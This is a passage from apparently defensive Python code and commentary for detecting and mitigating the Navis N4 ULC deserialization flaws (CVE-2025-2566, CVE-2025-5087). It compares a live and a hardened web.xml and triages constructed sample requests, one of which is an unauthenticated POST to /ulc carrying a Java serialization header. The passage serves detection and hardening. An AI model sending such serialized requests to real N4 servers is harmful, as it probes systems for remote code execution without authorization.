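# CONSTRUCTED descriptor: only the ULC/JNLP url-patterns are from the advisory.
WEB_XML_LIVE = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet-mapping><servlet-name>ulc</servlet-name><url-pattern>/ulc</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>jnlp</servlet-name><url-pattern>*.jnlp</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>html-ui</servlet-name><url-pattern>/html/*</url-pattern></servlet-mapping>
</web-app>"""

# The same descriptor after the ULC mappings are commented out per the advisory.
WEB_XML_HARDENED = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <!-- ULC disabled (CVE-2025-2566, CVE-2025-5087)
  <servlet-mapping><servlet-name>ulc</servlet-name><url-pattern>/ulc</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>jnlp</servlet-name><url-pattern>*.jnlp</url-pattern></servlet-mapping>
  -->
  <servlet-mapping><servlet-name>html-ui</servlet-name><url-pattern>/html/*</url-pattern></servlet-mapping>
</web-app>"""

# CONSTRUCTED requests (method, url, body, authenticated), not real N4 traffic.
SAMPLE_REQUESTS = [
    ("GET", "http://n4.example/launch/n4.jnlp", b"", False),
    ("POST", "http://n4.example/ulc", JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x11", False),
    ("POST", "http://n4.example/html/api/units", b'{"unit":"ABCU1234567"}', True),
]


def triage_all(requests=SAMPLE_REQUESTS) -> list:
    return [triage_request(*r) for r in requests]


if __name__ == "__main__":
    print("live web.xml exposes:", active_ulc_mappings(WEB_XML_LIVE))
    print("hardened web.xml exposes:", active_ulc_mappings(WEB_XML_HARDENED))
    for req, verdict in zip(SAMPLE_REQUESTS, triage_all()):
        print(req[0], req[1], "->", verdict)
```

Two caveats a practitioner should keep in mind. A load-balancer block on `*.jnlp` and `/ulc` only protects nodes behind that balancer, so the web.xml check is the one to run on every cluster node the advisory says may be reached directly. And the `0xACED0005` header only catches raw Java serialization; it is a cheap tripwire for the CVE-2025-2566 request shape, not a substitute for upgrading to the fixed N4 builds listed in the record.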